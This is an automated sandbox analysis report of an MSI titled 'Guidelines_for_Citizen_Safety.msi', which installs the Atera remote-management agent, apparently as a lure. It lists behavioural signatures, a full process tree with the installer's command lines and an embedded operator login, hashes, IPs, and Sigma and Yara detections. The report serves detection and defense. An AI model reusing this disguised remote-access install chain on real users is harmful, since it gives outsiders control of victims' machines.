Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Guidelines_for_Citizen_Safety.msi

Overview

General Information

Sample name:Guidelines_for_Citizen_Safety.msi
Analysis ID:1561804
MD5:b5b7dd5400c36976c4870af2f1e888a0
SHA1:dbd6fa30f976baf529d2005d68804ea92327e9bc
SHA256:fd000e4dbd1e3ce1c3604fa0d5ffe235ee676eb2c5af6ce7334ac69312456708
Tags:msiuser-JAMESWT_MHT
Infos:

Detection

AteraAgent
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AteraAgent
AI detected suspicious sample
Creates files in the system32 config directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Yara detected Generic Downloader
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Uses net.exe to stop services
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 7620 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Guidelines_for_Citizen_Safety.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7708 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7784 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding DA0792725E6113A4C2EFC78428B5F22F MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7832 cmdline: rundll32.exe "C:\Windows\Installer\MSI6A36.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7105375 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7892 cmdline: rundll32.exe "C:\Windows\Installer\MSI7013.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7106625 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 8000 cmdline: rundll32.exe "C:\Windows\Installer\MSI87B3.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7112656 11 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 4308 cmdline: rundll32.exe "C:\Windows\Installer\MSIA9F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7121500 33 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 8084 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F2302B5C45E6CFD0540EEC21654A91D9 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • net.exe (PID: 8120 cmdline: "NET" STOP AteraAgent MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 8168 cmdline: C:\Windows\system32\net1 STOP AteraAgent MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • taskkill.exe (PID: 7172 cmdline: "TaskKill.exe" /f /im AteraAgent.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AteraAgent.exe (PID: 7400 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="paul.fraxom@yzistanbul.me" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000Kso2pIAB" /AgentId="2094f497-2e94-42f0-b27c-add7e377a9d2" MD5: 477293F80461713D51A98A24023D45E8)
  • AteraAgent.exe (PID: 6216 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" MD5: 477293F80461713D51A98A24023D45E8)
    • sc.exe (PID: 7020 cmdline: "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 5852 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "6be74508-e40c-4e94-a6e8-129eac28e456" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB MD5: FD9DF72620BCA7C4D48BC105C89DFFD2)
      • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 7332 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "76e20853-e7dd-41ac-a560-28cfe22d3466" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB MD5: FD9DF72620BCA7C4D48BC105C89DFFD2)
      • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 6992 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "209f7be2-df48-4eff-a817-c4dc20cdcd81" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB MD5: FD9DF72620BCA7C4D48BC105C89DFFD2)
      • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\Temp\~DFE1D8FD4611557514.TMPJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
    C:\Windows\Temp\~DFD5E723F7AA2005AD.TMPJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
      C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLogJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
        C:\Windows\Temp\~DFB8E4C2B6BEE736E9.TMPJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
          C:\Windows\Temp\~DF9340E6CB357EA061.TMPJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
            Click to see the 14 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
              0000000F.00000002.2637180822.0000018896E70000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                0000000D.00000002.1539508523.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                  0000000F.00000002.2637942103.00000188970C0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                    00000019.00000002.2390295578.0000020EC378B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                      Click to see the 95 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      13.0.AteraAgent.exe.158ec7a0000.0.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                        19.2.AgentPackageAgentInformation.exe.2ac50640000.1.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                          19.0.AgentPackageAgentInformation.exe.2ac4fe20000.0.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                            19.0.AgentPackageAgentInformation.exe.2ac4fe20000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

                              Sigma Signatures

                              Sigma detected: Net.exe Execution
                              Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding F2302B5C45E6CFD0540EEC21654A91D9 E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 8084, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 8120, ProcessName: net.exe
                              Sigma detected: Stop Windows Service Via Net.EXE
                              Source: Process startedAuthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding F2302B5C45E6CFD0540EEC21654A91D9 E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 8084, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 8120, ProcessName: net.exe

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-11-24T11:15:47.493085+010028033053Unknown Traffic192.168.2.74977913.232.67.198443TCP
                              2024-11-24T11:15:50.876702+010028033053Unknown Traffic192.168.2.74979313.232.67.198443TCP
                              2024-11-24T11:16:35.988034+010028033053Unknown Traffic192.168.2.74990013.232.67.198443TCP
                              2024-11-24T11:16:46.853352+010028033053Unknown Traffic192.168.2.74993113.232.67.198443TCP
                              2024-11-24T11:16:53.737792+010028033053Unknown Traffic192.168.2.74995213.232.67.198443TCP
                              2024-11-24T11:16:59.756818+010028033053Unknown Traffic192.168.2.74997113.232.67.198443TCP
                              2024-11-24T11:17:02.925774+010028033053Unknown Traffic192.168.2.74998013.232.67.198443TCP
                              2024-11-24T11:17:10.758598+010028033053Unknown Traffic192.168.2.75000913.232.67.198443TCP
                              2024-11-24T11:17:16.730669+010028033053Unknown Traffic192.168.2.75003413.232.67.198443TCP
                              2024-11-24T11:17:22.259491+010028033053Unknown Traffic192.168.2.75005313.232.67.198443TCP
                              2024-11-24T11:17:26.300090+010028033053Unknown Traffic192.168.2.75006613.232.67.198443TCP
                              2024-11-24T11:17:30.206941+010028033053Unknown Traffic192.168.2.75007813.232.67.198443TCP
                              2024-11-24T11:17:35.554306+010028033053Unknown Traffic192.168.2.75008313.232.67.198443TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Multi AV Scanner detection for dropped file
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeReversingLabs: Detection: 26%
                              Multi AV Scanner detection for submitted file
                              Source: Guidelines_for_Citizen_Safety.msiReversingLabs: Detection: 28%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.6% probability
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLogJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLogJump to behavior
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49768 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49771 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 108.158.75.93:443 -> 192.168.2.7:49796 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49932 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49931 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49963 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49988 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49994 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50000 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50009 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50014 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50015 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50023 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50031 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50066 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50069 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50073 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50078 version: TLS 1.2
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb2|1\F source: rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: D:\a\1\s\AgentPackageAgentInformation\AgentPackageAgentInformation\obj\Release\AgentPackageAgentInformation.pdb source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000013.00000000.1743436849.000002AC4FE22000.00000002.00000001.01000000.00000018.sdmp, AgentPackageAgentInformation.exe.15.dr
                              Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1452340287.0000000007450000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1602449484.00000000070A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, AlphaControlAgentInstallation.dll.5.dr, AlphaControlAgentInstallation.dll.6.dr, AlphaControlAgentInstallation.dll.18.dr, AlphaControlAgentInstallation.dll.4.dr
                              Source: Binary string: \??\C:\Windows\symbols\dll\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1600208840.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1599197834.0000000002E56000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000012.00000002.1599979903.0000000002DE6000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\Windows\System.pdbpdbtem.pdbh. source: rundll32.exe, 00000012.00000003.1599173420.00000000070CD000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: AgentPackageAgentInformation.exe, 00000013.00000002.1778395763.000002AC68ED2000.00000002.00000001.01000000.0000001B.sdmp, Newtonsoft.Json.dll.15.dr
                              Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: rundll32.exe, 00000005.00000002.1452340287.0000000007477000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb<$ source: AteraAgent.exe, 0000000D.00000000.1477735807.00000158EC7A2000.00000002.00000001.01000000.00000010.sdmp, AteraAgent.exe.2.dr
                              Source: Binary string: \??\C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000005.00000002.1450208878.0000000002F24000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2644921266.00000188B0072000.00000002.00000001.01000000.0000001C.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000013.00000002.1778395763.000002AC68ED2000.00000002.00000001.01000000.0000001B.sdmp, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, Newtonsoft.Json.dll.5.dr, Newtonsoft.Json.dll.15.dr, Newtonsoft.Json.dll.18.dr
                              Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb source: AgentPackageAgentInformation.exe, 00000013.00000002.1777176033.000002AC50642000.00000002.00000001.01000000.0000001A.sdmp, Atera.AgentPackage.Common.dll.15.dr
                              Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdb source: System.ValueTuple.dll.2.dr
                              Source: Binary string: n\C:\Windows\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000005.00000002.1449544023.0000000002947000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1599311531.00000000004E7000.00000004.00000010.00020000.00000000.sdmp
                              Source: Binary string: C:\agent\_work\66\s\build\ship\x86\wixca.pdb source: Guidelines_for_Citizen_Safety.msi, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, 6c6861.msi.2.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.dr
                              Source: Binary string: dows\dll\System.pdb source: rundll32.exe, 00000012.00000002.1600208840.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1599197834.0000000002E56000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\symbols\dll\AlphaControlAgentInstallation.pdbw source: rundll32.exe, 00000012.00000002.1600208840.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1599197834.0000000002E56000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbP source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr
                              Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbPf source: AgentPackageAgentInformation.exe, 00000013.00000002.1777176033.000002AC50642000.00000002.00000001.01000000.0000001A.sdmp, Atera.AgentPackage.Common.dll.15.dr
                              Source: Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000012.00000003.1599173420.00000000070CD000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdbg, source: rundll32.exe, 00000012.00000003.1599173420.00000000070CD000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.PDBI source: rundll32.exe, 00000012.00000002.1599979903.0000000002DE6000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr
                              Source: Binary string: \??\C:\Windows\System.pdbI source: rundll32.exe, 00000012.00000002.1602449484.00000000070A0000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: ?*nC:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.pdbc source: rundll32.exe, 00000012.00000002.1599311531.00000000004E7000.00000004.00000010.00020000.00000000.sdmp
                              Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb source: AteraAgent.exe, 0000000D.00000000.1477735807.00000158EC7A2000.00000002.00000001.01000000.00000010.sdmp, AteraAgent.exe.2.dr
                              Source: Binary string: \??\C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.PDB source: rundll32.exe, 00000005.00000002.1450208878.0000000002F24000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdbSHA256 source: System.ValueTuple.dll.2.dr
                              Source: Binary string: \??\C:\Windows\System.pdbC source: rundll32.exe, 00000012.00000002.1602449484.00000000070A0000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdbSHA256 source: AteraAgent.exe, 0000000D.00000002.1536773813.00000158EEE32000.00000002.00000001.01000000.00000012.sdmp, Pubnub.dll.2.dr
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: rundll32.exe, 00000012.00000002.1600208840.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1599197834.0000000002E56000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdb source: AteraAgent.exe, 0000000D.00000002.1536773813.00000158EEE32000.00000002.00000001.01000000.00000012.sdmp, Pubnub.dll.2.dr
                              Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb` source: rundll32.exe, 00000012.00000002.1599979903.0000000002DE6000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdble source: rundll32.exe, 00000012.00000002.1599979903.0000000002E3D000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: ?*nC:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000005.00000002.1449544023.0000000002947000.00000004.00000010.00020000.00000000.sdmp
                              Source: Binary string: C:\agent\_work\66\s\build\ship\x86\SfxCA.pdb source: Guidelines_for_Citizen_Safety.msi, MSI7013.tmp.2.dr, 6c6863.msi.2.dr, MSIA9F5.tmp.2.dr, MSI87B3.tmp.2.dr, MSI6A36.tmp.2.dr, 6c6861.msi.2.dr
                              Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdbSHA256mW source: AteraAgent.exe, 0000000F.00000002.2649410681.00000188B0742000.00000002.00000001.01000000.0000001D.sdmp, ICSharpCode.SharpZipLib.dll.2.dr
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbo source: rundll32.exe, 00000012.00000002.1600208840.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1599197834.0000000002E56000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdbx5 source: rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdb source: AteraAgent.exe, 0000000F.00000002.2649410681.00000188B0742000.00000002.00000001.01000000.0000001D.sdmp, ICSharpCode.SharpZipLib.dll.2.dr
                              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA2567 source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2644921266.00000188B0072000.00000002.00000001.01000000.0000001C.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, Newtonsoft.Json.dll.5.dr, Newtonsoft.Json.dll.18.dr
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbg source: rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdbsec source: rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.pdby source: rundll32.exe, 00000012.00000002.1599979903.0000000002DE6000.00000004.00000020.00020000.00000000.sdmp
                              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
